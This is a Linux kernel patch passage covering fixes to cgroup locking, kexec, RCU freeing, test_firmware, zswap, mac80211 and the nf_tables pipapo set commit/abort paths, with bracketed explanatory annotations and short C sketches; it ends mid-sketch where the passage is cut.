+@@ -4404,14 +4404,14 @@ static int cgroup_add_cftypes(struct cgroup_subsys *ss, struct cftype *cfts)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	list_add_tail(&cfts->node, &ss->cfts);
+ 	ret = cgroup_apply_cftypes(cfts, true);
+ 	if (ret)
+ 		cgroup_rm_cftypes_locked(cfts);
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -5380,7 +5380,7 @@ static void css_release_work_fn(struct work_struct *work)
+ 	struct cgroup_subsys *ss = css->ss;
+ 	struct cgroup *cgrp = css->cgroup;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	css->flags |= CSS_RELEASED;
+ 	list_del_rcu(&css->sibling);
+@@ -5421,7 +5421,7 @@ static void css_release_work_fn(struct work_struct *work)
+ 					 NULL);
+ 	}
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	INIT_RCU_WORK(&css->destroy_rwork, css_free_rwork_fn);
+ 	queue_rcu_work(cgroup_destroy_wq, &css->destroy_rwork);
+@@ -5769,7 +5769,7 @@ static void css_killed_work_fn(struct work_struct *work)
+ 	struct cgroup_subsys_state *css =
+ 		container_of(work, struct cgroup_subsys_state, destroy_work);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	do {
+ 		offline_css(css);
+@@ -5778,7 +5778,7 @@ static void css_killed_work_fn(struct work_struct *work)
+ 		css = css->parent;
+ 	} while (css && atomic_dec_and_test(&css->online_cnt));
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ }
+ 
+ /* css kill confirmation processing requires process context, bounce */
+@@ -5962,7 +5962,7 @@ static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
+ 
+ 	pr_debug("Initializing cgroup subsys %s\n", ss->name);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	idr_init(&ss->css_idr);
+ 	INIT_LIST_HEAD(&ss->cfts);
+@@ -6006,7 +6006,7 @@ static void __init cgroup_init_subsys(struct cgroup_subsys *ss, bool early)
+ 
+ 	BUG_ON(online_css(css));
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ }
+ 
+ /**
+@@ -6066,7 +6066,7 @@ int __init cgroup_init(void)
+ 
+ 	get_user_ns(init_cgroup_ns.user_ns);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	/*
+ 	 * Add init_css_set to the hash table so that dfl_root can link to
+@@ -6077,7 +6077,7 @@ int __init cgroup_init(void)
+ 
+ 	BUG_ON(cgroup_setup_root(&cgrp_dfl_root, 0));
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	for_each_subsys(ss, ssid) {
+ 		if (ss->early_init) {
+@@ -6129,9 +6129,9 @@ int __init cgroup_init(void)
+ 		if (ss->bind)
+ 			ss->bind(init_css_set.subsys[ssid]);
+ 
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 		css_populate_dir(init_css_set.subsys[ssid]);
+-		mutex_unlock(&cgroup_mutex);
++		cgroup_unlock();
+ 	}
+ 
+ 	/* init_css_set.subsys[] has been updated, re-hash */
+@@ -6236,7 +6236,7 @@ int proc_cgroup_show(struct seq_file *m, struct pid_namespace *ns,
+ 	if (!buf)
+ 		goto out;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	spin_lock_irq(&css_set_lock);
+ 
+ 	for_each_root(root) {
+@@ -6291,7 +6291,7 @@ int proc_cgroup_show(struct seq_file *m, struct pid_namespace *ns,
+ 	retval = 0;
+ out_unlock:
+ 	spin_unlock_irq(&css_set_lock);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	kfree(buf);
+ out:
+ 	return retval;
+@@ -6375,7 +6375,7 @@ static int cgroup_css_set_fork(struct kernel_clone_args *kargs)
+ 	struct file *f;
+ 
+ 	if (kargs->flags & CLONE_INTO_CGROUP)
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 
+ 	cgroup_threadgroup_change_begin(current);
+ 
+@@ -6450,7 +6450,7 @@ static int cgroup_css_set_fork(struct kernel_clone_args *kargs)
+ 
+ err:
+ 	cgroup_threadgroup_change_end(current);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	if (f)
+ 		fput(f);
+ 	if (dst_cgrp)
+@@ -6471,19 +6471,18 @@ err:
+ static void cgroup_css_set_put_fork(struct kernel_clone_args *kargs)
+ 	__releases(&cgroup_threadgroup_rwsem) __releases(&cgroup_mutex)
+ {
+-	cgroup_threadgroup_change_end(current);
+-
+-	if (kargs->flags & CLONE_INTO_CGROUP) {
+-		struct cgroup *cgrp = kargs->cgrp;
+-		struct css_set *cset = kargs->cset;
++	struct cgroup *cgrp = kargs->cgrp;
++	struct css_set *cset = kargs->cset;
+ 
+-		mutex_unlock(&cgroup_mutex);
++	cgroup_threadgroup_change_end(current);
+ 
+-		if (cset) {
+-			put_css_set(cset);
+-			kargs->cset = NULL;
+-		}
++	if (cset) {
++		put_css_set(cset);
++		kargs->cset = NULL;
++	}
+ 
++	if (kargs->flags & CLONE_INTO_CGROUP) {
++		cgroup_unlock();
+ 		if (cgrp) {
+ 			cgroup_put(cgrp);
+ 			kargs->cgrp = NULL;
+diff --git a/kernel/kexec_file.c b/kernel/kexec_file.c
+index 45637511e0de6..6d787ae9deca0 100644
+--- a/kernel/kexec_file.c
++++ b/kernel/kexec_file.c
+@@ -898,10 +898,22 @@ static int kexec_purgatory_setup_sechdrs(struct purgatory_info *pi,
+ 		}
+ 
+ 		offset = ALIGN(offset, align);
++
++		/*
++		 * Check if the segment contains the entry point, if so,
++		 * calculate the value of image->start based on it.
++		 * If the compiler has produced more than one .text section
++		 * (e.g. .text.hot), they are generally after the main .text
++		 * section, and they shall not be used to calculate
++		 * image->start. So do not re-calculate image->start if it
++		 * is not set to the initial value, and warn the user so they
++		 * have a chance to fix their purgatory's linker script.
++		 */
+ 		if (sechdrs[i].sh_flags & SHF_EXECINSTR &&
+ 		    pi->ehdr->e_entry >= sechdrs[i].sh_addr &&
+ 		    pi->ehdr->e_entry < (sechdrs[i].sh_addr
+-					 + sechdrs[i].sh_size)) {
++					 + sechdrs[i].sh_size) &&
++		    !WARN_ON(kbuf->image->start != pi->ehdr->e_entry)) {
+ 			kbuf->image->start -= sechdrs[i].sh_addr;
+ 			kbuf->image->start += kbuf->mem + offset;
+ 		}
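[The kexec hunk recomputes image->start only for the executable section that actually contains e_entry, and warns if a second candidate such as a compiler-emitted .text.hot would clobber it. The relocation arithmetic itself is just a rebase, sketched here:]

    /* e_entry is expressed against the section's link-time address; once
     * the section is placed at load_addr, the runtime entry point becomes:
     */
    static unsigned long reloc_entry(unsigned long e_entry,
                                     unsigned long sh_addr,   /* link-time base */
                                     unsigned long load_addr) /* placed base    */
    {
            return e_entry - sh_addr + load_addr;
    }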
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index ce34ca0b5b985..d03122f90cc48 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -3099,6 +3099,18 @@ need_offload_krc(struct kfree_rcu_cpu *krcp)
+ 	return !!krcp->head;
+ }
+ 
++static bool
++need_wait_for_krwp_work(struct kfree_rcu_cpu_work *krwp)
++{
++	int i;
++
++	for (i = 0; i < FREE_N_CHANNELS; i++)
++		if (krwp->bkvhead_free[i])
++			return true;
++
++	return !!krwp->head_free;
++}
++
+ static void
+ schedule_delayed_monitor_work(struct kfree_rcu_cpu *krcp)
+ {
+@@ -3130,14 +3142,13 @@ static void kfree_rcu_monitor(struct work_struct *work)
+ 	for (i = 0; i < KFREE_N_BATCHES; i++) {
+ 		struct kfree_rcu_cpu_work *krwp = &(krcp->krw_arr[i]);
+ 
+-		// Try to detach bkvhead or head and attach it over any
+-		// available corresponding free channel. It can be that
+-		// a previous RCU batch is in progress, it means that
+-		// immediately to queue another one is not possible so
+-		// in that case the monitor work is rearmed.
+-		if ((krcp->bkvhead[0] && !krwp->bkvhead_free[0]) ||
+-			(krcp->bkvhead[1] && !krwp->bkvhead_free[1]) ||
+-				(krcp->head && !krwp->head_free)) {
++		// Try to detach bulk_head or head and attach it, but only when
++		// all channels are free: a channel that is still busy means
++		// krwp has in-flight RCU work handling a previous batch.
++		if (need_wait_for_krwp_work(krwp))
++			continue;
++
++		if (need_offload_krc(krcp)) {
+ 			// Channel 1 corresponds to the SLAB-pointer bulk path.
+ 			// Channel 2 corresponds to vmalloc-pointer bulk path.
+ 			for (j = 0; j < FREE_N_CHANNELS; j++) {
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index 7f165c517338a..13d3fa6aa972c 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -22,6 +22,7 @@
+ #include <linux/slab.h>
+ #include <linux/uaccess.h>
+ #include <linux/delay.h>
++#include <linux/kstrtox.h>
+ #include <linux/kthread.h>
+ #include <linux/vmalloc.h>
+ #include <linux/efi_embedded_fw.h>
+@@ -359,16 +360,26 @@ static ssize_t config_test_show_str(char *dst,
+ 	return len;
+ }
+ 
+-static int test_dev_config_update_bool(const char *buf, size_t size,
++static inline int __test_dev_config_update_bool(const char *buf, size_t size,
+ 				       bool *cfg)
+ {
+ 	int ret;
+ 
+-	mutex_lock(&test_fw_mutex);
+-	if (strtobool(buf, cfg) < 0)
++	if (kstrtobool(buf, cfg) < 0)
+ 		ret = -EINVAL;
+ 	else
+ 		ret = size;
++
++	return ret;
++}
++
++static int test_dev_config_update_bool(const char *buf, size_t size,
++				       bool *cfg)
++{
++	int ret;
++
++	mutex_lock(&test_fw_mutex);
++	ret = __test_dev_config_update_bool(buf, size, cfg);
+ 	mutex_unlock(&test_fw_mutex);
+ 
+ 	return ret;
+@@ -379,7 +390,8 @@ static ssize_t test_dev_config_show_bool(char *buf, bool val)
+ 	return snprintf(buf, PAGE_SIZE, "%d\n", val);
+ }
+ 
+-static int test_dev_config_update_size_t(const char *buf,
++static int __test_dev_config_update_size_t(
++					 const char *buf,
+ 					 size_t size,
+ 					 size_t *cfg)
+ {
+@@ -390,9 +402,7 @@ static int test_dev_config_update_size_t(const char *buf,
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&test_fw_mutex);
+ 	*(size_t *)cfg = new;
+-	mutex_unlock(&test_fw_mutex);
+ 
+ 	/* Always return full write size even if we didn't consume all */
+ 	return size;
+@@ -408,7 +418,7 @@ static ssize_t test_dev_config_show_int(char *buf, int val)
+ 	return snprintf(buf, PAGE_SIZE, "%d\n", val);
+ }
+ 
+-static int test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
++static int __test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
+ {
+ 	u8 val;
+ 	int ret;
+@@ -417,14 +427,23 @@ static int test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&test_fw_mutex);
+ 	*(u8 *)cfg = val;
+-	mutex_unlock(&test_fw_mutex);
+ 
+ 	/* Always return full write size even if we didn't consume all */
+ 	return size;
+ }
+ 
++static int test_dev_config_update_u8(const char *buf, size_t size, u8 *cfg)
++{
++	int ret;
++
++	mutex_lock(&test_fw_mutex);
++	ret = __test_dev_config_update_u8(buf, size, cfg);
++	mutex_unlock(&test_fw_mutex);
++
++	return ret;
++}
++
+ static ssize_t test_dev_config_show_u8(char *buf, u8 val)
+ {
+ 	return snprintf(buf, PAGE_SIZE, "%u\n", val);
+@@ -477,10 +496,10 @@ static ssize_t config_num_requests_store(struct device *dev,
+ 		mutex_unlock(&test_fw_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&test_fw_mutex);
+ 
+-	rc = test_dev_config_update_u8(buf, count,
+-				       &test_fw_config->num_requests);
++	rc = __test_dev_config_update_u8(buf, count,
++					 &test_fw_config->num_requests);
++	mutex_unlock(&test_fw_mutex);
+ 
+ out:
+ 	return rc;
+@@ -524,10 +543,10 @@ static ssize_t config_buf_size_store(struct device *dev,
+ 		mutex_unlock(&test_fw_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&test_fw_mutex);
+ 
+-	rc = test_dev_config_update_size_t(buf, count,
+-					   &test_fw_config->buf_size);
++	rc = __test_dev_config_update_size_t(buf, count,
++					     &test_fw_config->buf_size);
++	mutex_unlock(&test_fw_mutex);
+ 
+ out:
+ 	return rc;
+@@ -554,10 +573,10 @@ static ssize_t config_file_offset_store(struct device *dev,
+ 		mutex_unlock(&test_fw_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&test_fw_mutex);
+ 
+-	rc = test_dev_config_update_size_t(buf, count,
+-					   &test_fw_config->file_offset);
++	rc = __test_dev_config_update_size_t(buf, count,
++					     &test_fw_config->file_offset);
++	mutex_unlock(&test_fw_mutex);
+ 
+ out:
+ 	return rc;
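[The test_firmware changes split each updater into a locked wrapper and a double-underscore body that assumes the caller holds test_fw_mutex, so the store handlers can run the whole check-and-update under one critical section instead of dropping and retaking the lock. The convention, reduced to a sketch:]

    #include <pthread.h>

    struct cfg {
            pthread_mutex_t lock;
            int val;
    };

    /* __cfg_update: caller must hold c->lock */
    static int __cfg_update(struct cfg *c, int val)
    {
            c->val = val;
            return 0;
    }

    static int cfg_update(struct cfg *c, int val)
    {
            pthread_mutex_lock(&c->lock);
            int ret = __cfg_update(c, val);
            pthread_mutex_unlock(&c->lock);
            return ret;
    }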
+diff --git a/mm/zswap.c b/mm/zswap.c
+index 708b82dbe8a46..b3829ada4a413 100644
+--- a/mm/zswap.c
++++ b/mm/zswap.c
+@@ -1138,9 +1138,16 @@ static int zswap_frontswap_store(unsigned type, pgoff_t offset,
+ 		goto reject;
+ 	}
+ 
++	/*
++	 * XXX: zswap reclaim does not work with cgroups yet. Without a
++	 * cgroup-aware entry LRU, we will push out entries system-wide based on
++	 * local cgroup limits.
++	 */
+ 	objcg = get_obj_cgroup_from_page(page);
+-	if (objcg && !obj_cgroup_may_zswap(objcg))
+-		goto shrink;
++	if (objcg && !obj_cgroup_may_zswap(objcg)) {
++		ret = -ENOMEM;
++		goto reject;
++	}
+ 
+ 	/* reclaim space if needed */
+ 	if (zswap_is_full()) {
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index bf081f62ae58b..6c0f2149f2c72 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -627,37 +627,6 @@ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ }
+ EXPORT_SYMBOL(neigh_lookup);
+ 
+-struct neighbour *neigh_lookup_nodev(struct neigh_table *tbl, struct net *net,
+-				     const void *pkey)
+-{
+-	struct neighbour *n;
+-	unsigned int key_len = tbl->key_len;
+-	u32 hash_val;
+-	struct neigh_hash_table *nht;
+-
+-	NEIGH_CACHE_STAT_INC(tbl, lookups);
+-
+-	rcu_read_lock_bh();
+-	nht = rcu_dereference_bh(tbl->nht);
+-	hash_val = tbl->hash(pkey, NULL, nht->hash_rnd) >> (32 - nht->hash_shift);
+-
+-	for (n = rcu_dereference_bh(nht->hash_buckets[hash_val]);
+-	     n != NULL;
+-	     n = rcu_dereference_bh(n->next)) {
+-		if (!memcmp(n->primary_key, pkey, key_len) &&
+-		    net_eq(dev_net(n->dev), net)) {
+-			if (!refcount_inc_not_zero(&n->refcnt))
+-				n = NULL;
+-			NEIGH_CACHE_STAT_INC(tbl, hits);
+-			break;
+-		}
+-	}
+-
+-	rcu_read_unlock_bh();
+-	return n;
+-}
+-EXPORT_SYMBOL(neigh_lookup_nodev);
+-
+ static struct neighbour *
+ ___neigh_create(struct neigh_table *tbl, const void *pkey,
+ 		struct net_device *dev, u32 flags,
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 808983bc2ec9f..4651aaf70db4f 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -114,7 +114,8 @@ static int ping_v6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	addr_type = ipv6_addr_type(daddr);
+ 	if ((__ipv6_addr_needs_scope_id(addr_type) && !oif) ||
+ 	    (addr_type & IPV6_ADDR_MAPPED) ||
+-	    (oif && sk->sk_bound_dev_if && oif != sk->sk_bound_dev_if))
++	    (oif && sk->sk_bound_dev_if && oif != sk->sk_bound_dev_if &&
++	     l3mdev_master_ifindex_by_index(sock_net(sk), oif) != sk->sk_bound_dev_if))
+ 		return -EINVAL;
+ 
+ 	ipcm6_init_sk(&ipc6, np);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 06b9df2fbcd77..23a44edcb11f7 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -4732,11 +4732,16 @@ static int ieee80211_add_intf_link(struct wiphy *wiphy,
+ 				   unsigned int link_id)
+ {
+ 	struct ieee80211_sub_if_data *sdata = IEEE80211_WDEV_TO_SUB_IF(wdev);
++	int res;
+ 
+ 	if (wdev->use_4addr)
+ 		return -EOPNOTSUPP;
+ 
+-	return ieee80211_vif_set_links(sdata, wdev->valid_links);
++	mutex_lock(&sdata->local->mtx);
++	res = ieee80211_vif_set_links(sdata, wdev->valid_links);
++	mutex_unlock(&sdata->local->mtx);
++
++	return res;
+ }
+ 
+ static void ieee80211_del_intf_link(struct wiphy *wiphy,
+@@ -4745,7 +4750,9 @@ static void ieee80211_del_intf_link(struct wiphy *wiphy,
+ {
+ 	struct ieee80211_sub_if_data *sdata = IEEE80211_WDEV_TO_SUB_IF(wdev);
+ 
++	mutex_lock(&sdata->local->mtx);
+ 	ieee80211_vif_set_links(sdata, wdev->valid_links);
++	mutex_unlock(&sdata->local->mtx);
+ }
+ 
+ static int sta_add_link_station(struct ieee80211_local *local,
+diff --git a/net/mac80211/link.c b/net/mac80211/link.c
+index a1b3031fefce2..a85b44c1bc995 100644
+--- a/net/mac80211/link.c
++++ b/net/mac80211/link.c
+@@ -2,7 +2,7 @@
+ /*
+  * MLO link handling
+  *
+- * Copyright (C) 2022 Intel Corporation
++ * Copyright (C) 2022-2023 Intel Corporation
+  */
+ #include <linux/slab.h>
+ #include <linux/kernel.h>
+@@ -387,6 +387,7 @@ static int _ieee80211_set_active_links(struct ieee80211_sub_if_data *sdata,
+ 						 IEEE80211_CHANCTX_SHARED);
+ 		WARN_ON_ONCE(ret);
+ 
++		ieee80211_mgd_set_link_qos_params(link);
+ 		ieee80211_link_info_change_notify(sdata, link,
+ 						  BSS_CHANGED_ERP_CTS_PROT |
+ 						  BSS_CHANGED_ERP_PREAMBLE |
+@@ -401,7 +402,6 @@ static int _ieee80211_set_active_links(struct ieee80211_sub_if_data *sdata,
+ 						  BSS_CHANGED_TWT |
+ 						  BSS_CHANGED_HE_OBSS_PD |
+ 						  BSS_CHANGED_HE_BSS_COLOR);
+-		ieee80211_mgd_set_link_qos_params(link);
+ 	}
+ 
+ 	old_active = sdata->vif.active_links;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 437891cb8c417..13d4913266b4d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3669,7 +3669,8 @@ err_destroy_flow_rule:
+ 	if (flow)
+ 		nft_flow_rule_destroy(flow);
+ err_release_rule:
+-	nf_tables_rule_release(&ctx, rule);
++	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE);
++	nf_tables_rule_destroy(&ctx, rule);
+ err_release_expr:
+ 	for (i = 0; i < n; i++) {
+ 		if (expr_info[i].ops) {
+@@ -4730,6 +4731,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	set->num_exprs = num_exprs;
+ 	set->handle = nf_tables_alloc_handle(table);
++	INIT_LIST_HEAD(&set->pending_update);
+ 
+ 	err = nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set);
+ 	if (err < 0)
+@@ -8992,10 +8994,25 @@ static void nf_tables_commit_audit_log(struct list_head *adl, u32 generation)
+ 	}
+ }
+ 
++static void nft_set_commit_update(struct list_head *set_update_list)
++{
++	struct nft_set *set, *next;
++
++	list_for_each_entry_safe(set, next, set_update_list, pending_update) {
++		list_del_init(&set->pending_update);
++
++		if (!set->ops->commit)
++			continue;
++
++		set->ops->commit(set);
++	}
++}
++
+ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct nft_trans *trans, *next;
++	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
+ 	struct nft_chain *chain;
+ 	struct nft_table *table;
+@@ -9154,6 +9171,11 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 			nf_tables_setelem_notify(&trans->ctx, te->set,
+ 						 &te->elem,
+ 						 NFT_MSG_NEWSETELEM);
++			if (te->set->ops->commit &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_DELSETELEM:
+@@ -9167,6 +9189,11 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 				atomic_dec(&te->set->nelems);
+ 				te->set->ndeact--;
+ 			}
++			if (te->set->ops->commit &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			break;
+ 		case NFT_MSG_NEWOBJ:
+ 			if (nft_trans_obj_update(trans)) {
+@@ -9227,6 +9254,8 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 		}
+ 	}
+ 
++	nft_set_commit_update(&set_update_list);
++
+ 	nft_commit_notify(net, NETLINK_CB(skb).portid);
+ 	nf_tables_gen_notify(net, skb, NFT_MSG_NEWGEN);
+ 	nf_tables_commit_audit_log(&adl, nft_net->base_seq);
+@@ -9283,10 +9312,25 @@ static void nf_tables_abort_release(struct nft_trans *trans)
+ 	kfree(trans);
+ }
+ 
++static void nft_set_abort_update(struct list_head *set_update_list)
++{
++	struct nft_set *set, *next;
++
++	list_for_each_entry_safe(set, next, set_update_list, pending_update) {
++		list_del_init(&set->pending_update);
++
++		if (!set->ops->abort)
++			continue;
++
++		set->ops->abort(set);
++	}
++}
++
+ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct nft_trans *trans, *next;
++	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
+ 
+ 	if (action == NFNL_ABORT_VALIDATE &&
+@@ -9384,6 +9428,12 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			nft_setelem_remove(net, te->set, &te->elem);
+ 			if (!nft_setelem_is_catchall(te->set, &te->elem))
+ 				atomic_dec(&te->set->nelems);
++
++			if (te->set->ops->abort &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			break;
+ 		case NFT_MSG_DELSETELEM:
+ 			te = (struct nft_trans_elem *)trans->data;
+@@ -9393,6 +9443,11 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			if (!nft_setelem_is_catchall(te->set, &te->elem))
+ 				te->set->ndeact--;
+ 
++			if (te->set->ops->abort &&
++			    list_empty(&te->set->pending_update)) {
++				list_add_tail(&te->set->pending_update,
++					      &set_update_list);
++			}
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWOBJ:
+@@ -9433,6 +9488,8 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 		}
+ 	}
+ 
++	nft_set_abort_update(&set_update_list);
++
+ 	synchronize_rcu();
+ 
+ 	list_for_each_entry_safe_reverse(trans, next,
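[In the commit and abort paths above, a set is queued for its callback at most once per transaction; the trick is that an intrusive list node that is already linked is non-empty, so list_empty() doubles as the dedup test. A self-contained sketch of that idiom:]

    #include <stdbool.h>

    struct list_head { struct list_head *next, *prev; };

    static void INIT_LIST_HEAD(struct list_head *h) { h->next = h->prev = h; }
    static bool list_empty(const struct list_head *h) { return h->next == h; }

    static void list_add_tail(struct list_head *n, struct list_head *h)
    {
            n->prev = h->prev; n->next = h;
            h->prev->next = n; h->prev = n;
    }

    struct set { struct list_head pending_update; /* INIT'd at set creation */ };

    static void queue_update(struct set *s, struct list_head *update_list)
    {
            if (list_empty(&s->pending_update))   /* not queued yet this transaction */
                    list_add_tail(&s->pending_update, update_list);
    }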
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index ae7146475d17a..c9fbe0f707b5f 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -533,7 +533,8 @@ ack:
+ 			 * processed, this avoids that the same error is
+ 			 * reported several times when replaying the batch.
+ 			 */
+-			if (nfnl_err_add(&err_list, nlh, err, &extack) < 0) {
++			if (err == -ENOMEM ||
++			    nfnl_err_add(&err_list, nlh, err, &extack) < 0) {
+ 				/* We failed to enqueue an error, reset the
+ 				 * list of errors and send OOM to userspace
+ 				 * pointing to the batch header.
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 06d46d1826347..15e451dc3fc46 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1600,17 +1600,10 @@ static void pipapo_free_fields(struct nft_pipapo_match *m)
+ 	}
+ }
+ 
+-/**
+- * pipapo_reclaim_match - RCU callback to free fields from old matching data
+- * @rcu:	RCU head
+- */
+-static void pipapo_reclaim_match(struct rcu_head *rcu)
++static void pipapo_free_match(struct nft_pipapo_match *m)
+ {
+-	struct nft_pipapo_match *m;
+ 	int i;
+ 
+-	m = container_of(rcu, struct nft_pipapo_match, rcu);
+-
+ 	for_each_possible_cpu(i)
+ 		kfree(*per_cpu_ptr(m->scratch, i));
+ 
+@@ -1625,7 +1618,19 @@ static void pipapo_reclaim_match(struct rcu_head *rcu)
+ }
+ 
+ /**
+- * pipapo_commit() - Replace lookup data with current working copy
++ * pipapo_reclaim_match - RCU callback to free fields from old matching data
++ * @rcu:	RCU head
++ */
++static void pipapo_reclaim_match(struct rcu_head *rcu)
++{
++	struct nft_pipapo_match *m;
++
++	m = container_of(rcu, struct nft_pipapo_match, rcu);
++	pipapo_free_match(m);
++}
++
++/**
++ * nft_pipapo_commit() - Replace lookup data with current working copy
+  * @set:	nftables API set representation
+  *
+  * While at it, check if we should perform garbage collection on the working
+@@ -1635,7 +1640,7 @@ static void pipapo_reclaim_match(struct rcu_head *rcu)
+  * We also need to create a new working copy for subsequent insertions and
+  * deletions.
+  */
+-static void pipapo_commit(const struct nft_set *set)
++static void nft_pipapo_commit(const struct nft_set *set)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_match *new_clone, *old;
+@@ -1660,6 +1665,26 @@ static void pipapo_commit(const struct nft_set *set)
+ 	priv->clone = new_clone;
+ }
+ 
++static void nft_pipapo_abort(const struct nft_set *set)
++{
++	struct nft_pipapo *priv = nft_set_priv(set);
++	struct nft_pipapo_match *new_clone, *m;
++
++	if (!priv->dirty)
++		return;
++
++	m = rcu_dereference(priv->match);
++
++	new_clone = pipapo_clone(m);
++	if (IS_ERR(new_clone))
++		return;
++
++	priv->dirty = false;
++
++	pipapo_free_match(priv->clone);
++	priv->clone = new_clone;
++}
++
+ /**
+  * nft_pipapo_activate() - Mark element reference as active given key, commit
+  * @net:	Network namespace
+@@ -1667,8 +1692,7 @@ static void pipapo_commit(const struct nft_set *set)
+  * @elem:	nftables API element representation containing key data
+  *
+  * On insertion, elements are added to a copy of the matching data currently
+- * in use for lookups, and not directly inserted into current lookup data, so
+- * we'll take care of that by calling pipapo_commit() here. Both
++ * in use for lookups, and not directly inserted into current lookup data. Both
+  * nft_pipapo_insert() and nft_pipapo_activate() are called once for each
+  * element, hence we can't purpose either one as a real commit operation.
+  */
+@@ -1684,8 +1708,6 @@ static void nft_pipapo_activate(const struct net *net,
+ 
+ 	nft_set_elem_change_active(net, set, &e->ext);
+ 	nft_set_elem_clear_busy(&e->ext);
+-
+-	pipapo_commit(set);
+ }
+ 
+ /**
+@@ -1931,7 +1953,6 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 		if (i == m->field_count) {
+ 			priv->dirty = true;
+ 			pipapo_drop(m, rulemap);
+-			pipapo_commit(set);
+ 			return;
+ 		}
+ 
+@@ -2230,6 +2251,8 @@ const struct nft_set_type nft_set_pipapo_type = {
+ 		.init		= nft_pipapo_init,
+ 		.destroy	= nft_pipapo_destroy,
+ 		.gc_init	= nft_pipapo_gc_init,
++		.commit		= nft_pipapo_commit,
++		.abort		= nft_pipapo_abort,
+ 		.elemsize	= offsetof(struct nft_pipapo_elem, ext),
+ 	},
+ };
+@@ -2252,6 +2275,8 @@ const struct nft_set_type nft_set_pipapo_avx2_type = {
+ 		.init		= nft_pipapo_init,
+ 		.destroy	= nft_pipapo_destroy,
+ 		.gc_init	= nft_pipapo_gc_init,
++		.commit		= nft_pipapo_commit,
++		.abort		= nft_pipapo_abort,
+ 		.elemsize	= offsetof(struct nft_pipapo_elem, ext),
+ 	},
+ };
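[pipapo keeps a working clone of its lookup data; with the new hooks, commit publishes the clone and re-clones for the next transaction, while abort discards the dirty clone and re-clones from the still-live copy. A compressed model of that double-buffering, where malloc stands in for pipapo_clone() and plain assignment for the RCU publish:]

    #include <stdbool.h>
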